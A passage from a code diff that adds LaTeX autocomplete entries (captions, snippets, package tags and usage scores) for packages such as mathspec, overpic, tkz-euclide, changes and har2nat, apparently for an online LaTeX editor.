+ score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathspec-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'mathspec-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 7.723677706376668e-5, + }, + 
{ + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'mathspec-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'mathspec-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'mathspec-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'mathspec-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mathspec-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'mathspec-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'mathspec-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mathspec-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mathspec-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mathspec-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'mathspec-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mathspec-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathspec-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'mathspec-cmd', + score: 0.0063276692758974925, + }, + ], + overpic: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'overpic-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'overpic-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'overpic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'overpic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'overpic-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'overpic-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'overpic-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'overpic-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'overpic-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'overpic-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'overpic-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'overpic-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: 
'\\graphicspath{$1}', + meta: 'overpic-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'overpic-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + ], + 'tkz-euclide': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-euclide-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-euclide-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-euclide-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-euclide-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-euclide-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-euclide-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 
'tkz-euclide-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-euclide-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-euclide-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-euclide-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-euclide-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-euclide-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-euclide-cmd', + score: 0.2864294797053033, + }, + ], + morewrites: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'morewrites-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'morewrites-cmd', + score: 0.2864294797053033, + }, + ], + pgflibraryshapes: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 
'pgflibraryshapes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgflibraryshapes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgflibraryshapes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryshapes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryshapes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgflibraryshapes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryshapes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryshapes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 
'pgflibraryshapes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryshapes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.2864294797053033, + }, + ], + pdfcolparallel: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdfcolparallel-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'pdfcolparallel-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'pdfcolparallel-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfcolparallel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pdfcolparallel-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ParallelRText{}', + snippet: '\\ParallelRText{$1}', + meta: 'pdfcolparallel-cmd', + score: 0.0005986518360651812, + }, + { + caption: '\\ParallelLText{}', + snippet: '\\ParallelLText{$1}', + meta: 'pdfcolparallel-cmd', + score: 0.0005986518360651812, + }, + { + caption: '\\ParallelPar', + snippet: '\\ParallelPar', + meta: 'pdfcolparallel-cmd', + score: 0.0005986518360651812, + }, + ], + aeguill: [ + { + caption: '\\guillemotleft', + snippet: '\\guillemotleft', + meta: 'aeguill-cmd', + score: 9.764370963946686e-5, + }, + { + caption: '\\guillemotright', + snippet: '\\guillemotright', + meta: 'aeguill-cmd', + score: 9.764370963946686e-5, + }, + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'aeguill-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'aeguill-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aeguill-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aeguill-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aeguill-cmd', + score: 0.021170869458413965, + }, + ], + changes: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'changes-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'changes-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'changes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'changes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 
0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'changes-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'changes-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'changes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'changes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'changes-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'changes-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'changes-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'changes-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'changes-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'changes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'changes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'changes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'changes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'changes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'changes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'changes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'changes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + 
snippet: '\\colorbox{$1}{$2}', + meta: 'changes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'changes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'changes-cmd', + score: 0.2864294797053033, + }, + ], + droidmono: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'droidmono-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'droidmono-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'droidmono-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'droidmono-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'droidmono-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'droidmono-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\scshape', + snippet: '\\scshape', + meta: 'droidmono-cmd', + score: 0.05364108855914402, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'droidmono-cmd', + score: 0.00037306820619479756, + }, + ], + tgheros: [ + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'tgheros-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'tgheros-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgheros-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgheros-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgheros-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgheros-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgheros-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgheros-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgheros-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgheros-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgheros-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgheros-cmd', + score: 0.021170869458413965, + }, + ], + har2nat: [ + { + caption: '\\citeasnoun{}', + snippet: '\\citeasnoun{$1}', + meta: 'har2nat-cmd', + score: 0.010452591644582749, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'har2nat-cmd', + score: 2.341195220791228, + }, + { + caption: '\\citealt{}', + snippet: '\\citealt{$1}', + meta: 'har2nat-cmd', + score: 0.007302105441724955, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'har2nat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'har2nat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'har2nat-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'har2nat-cmd', + score: 0.04990693820960752, + 
}, + { + caption: '\\bibname', + snippet: '\\bibname', + meta: 'har2nat-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibname{}', + snippet: '\\bibname{$1}', + meta: 'har2nat-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibpunct', + snippet: '\\bibpunct', + meta: 'har2nat-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct{}{}{}{}{}{}', + snippet: '\\bibpunct{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'har2nat-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct[]{}{}{}{}{}{}', + snippet: '\\bibpunct[$1]{$2}{$3}{$4}{$5}{$6}{$7}', + meta: 'har2nat-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\citepalias{}', + snippet: '\\citepalias{$1}', + meta: 'har2nat-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\citepalias[][]{}', + snippet: '\\citepalias[$1][$2]{$3}', + meta: 'har2nat-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'har2nat-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\citep{}', + snippet: '\\citep{$1}', + meta: 'har2nat-cmd', + score: 0.2941882834697057, + }, + { + caption: '\\bibsection', + snippet: '\\bibsection', + meta: 'har2nat-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\bibsection{}', + snippet: '\\bibsection{$1}', + meta: 'har2nat-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\refname', + snippet: '\\refname', + meta: 'har2nat-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\refname{}', + snippet: '\\refname{$1}', + meta: 'har2nat-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\citealp{}', + snippet: '\\citealp{$1}', + meta: 'har2nat-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\citealp[]{}', + snippet: '\\citealp[$1]{$2}', + meta: 'har2nat-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'har2nat-cmd', + score: 2.341195220791228, + }, + { + caption: '\\citetalias{}', + snippet: '\\citetalias{$1}', + meta: 'har2nat-cmd', + score: 0.001419571355756266, + }, + { + caption: '\\bibitem{}', + snippet: '\\bibitem{$1}', + meta: 'har2nat-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibitem[]{}', + snippet: '\\bibitem[$1]{$2}', + meta: 'har2nat-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\citet{}', + snippet: '\\citet{$1}', + meta: 'har2nat-cmd', + score: 0.09046048561361801, + }, + { + caption: '\\defcitealias{}{}', + snippet: '\\defcitealias{$1}{$2}', + meta: 'har2nat-cmd', + score: 